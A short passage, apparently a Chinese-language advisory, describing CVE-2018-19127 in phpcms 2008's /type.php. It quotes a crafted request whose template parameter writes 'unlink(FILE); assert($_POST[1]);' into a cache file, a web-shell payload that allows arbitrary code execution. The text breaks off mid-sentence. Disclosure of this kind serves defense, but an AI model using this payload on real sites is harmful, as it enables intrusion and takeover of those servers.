phpcms-2008-CVE-2018-19127 最近，我们在phpcms 2008源代码的/type.php中发现了一个漏洞。当攻击者发送诸如“ /type.php?template=tag _（）{}; unlink（ FILE ）; assert（$ _ POST [1]）; {//../ rss”之类的精心设计的请求时，恶意内容（在这种情况下“ unlink（ FILE ）; assert（$ _ POST [1]）;”）将被写入phpcms 2008网站上的缓存文件（在本例中为“